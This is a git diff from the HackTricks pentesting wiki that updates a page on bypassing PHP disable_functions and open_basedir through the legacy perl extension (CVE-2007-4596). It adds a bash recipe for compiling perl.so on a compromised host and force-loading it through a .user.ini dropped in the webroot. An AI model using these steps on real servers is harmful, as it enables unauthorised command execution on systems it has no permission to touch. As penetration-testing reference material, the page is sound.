Merge pull request #1829 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_php-tricks-esp_php-useful-functions-disable_functions-open_basedir-bypass_disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit_20260130_023325

Research Update Enhanced src/network-services-pentesting/pen...

Author: carlospolop

src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md

@@ -6,9 +6,14 @@
 
 The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although `safe_mode` disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.
 
+## Compatibility & Packaging Status (2025)
+
+* The last PECL release (`perl-1.0.1`, 2013) targets PHP ≥5.0; PHP 8+ generally fails because the Zend APIs changed.
+* PECL is being superseded by PIE, but older stacks still ship PECL/pear. Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).
+
 ## Building a Testable Environment in 2025
 
-* The last publicly shipped build (`perl-1.0.1`, January 2013) targets PHP ≥5.0. Fetch it from PECL, compile it for the exact PHP branch you plan to attack, and load it globally (`php.ini`) or via `dl()` (if permitted).
+* Fetch `perl-1.0.1` from PECL, compile it for the PHP branch you plan to attack, and load it globally (`php.ini`) or via `dl()` (if permitted).
 * Quick Debian-based lab recipe:
   ```bash
   sudo apt install php5.6 php5.6-dev php-pear build-essential
@@ -19,6 +24,23 @@ The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extensio
 * During exploitation confirm availability with `var_dump(extension_loaded('perl'));` or `print_r(get_loaded_extensions());`. If absent, search for `perl.so` or abuse writable `php.ini`/`.user.ini` entries to force-load it.
 * Because the interpreter lives inside the PHP worker, no external binaries are needed—network egress filters or `proc_open` blacklists do not matter.
 
+### On-host build chain when phpize is reachable
+
+If `phpize` and build-essential are present on the compromised host, you can compile and drop `perl.so` without shelling out to the OS:
+
+```bash
+# grab the tarball from PECL
+wget https://pecl.php.net/get/perl-1.0.1.tgz
+tar xvf perl-1.0.1.tgz && cd perl-1.0.1
+phpize
+./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
+make -j$(nproc)
+cp modules/perl.so /tmp/perl.so
+# then load with a .user.ini in the webroot if main php.ini is read-only
+echo "extension=/tmp/perl.so" > /var/www/html/.user.ini
+```
+If `open_basedir` is enforced, ensure the dropped `.user.ini` and `.so` live in an allowed path; the `extension=` directive is still honored inside the basedir. The compilation flow mirrors the PHP manual for building PECL extensions.
+
 ## Original PoC (NetJackal)
 
 From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/), still handy to confirm the extension responds to `eval`:
@@ -96,5 +118,7 @@ $perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);
 
 - [CVE-2007-4596 summary and timeline](https://www.cvedetails.com/cve/CVE-2007-4596/)
 - [PECL perl extension package information](https://pecl.php.net/package/perl)
+- [PHP Manual: building PECL extensions with phpize](https://www.php.net/manual/en/install.pecl.phpize.php)
+- [PECL homepage announcing PIE replacement](https://pecl.php.net/)
 
 {{#include ../../../../banners/hacktricks-training.md}}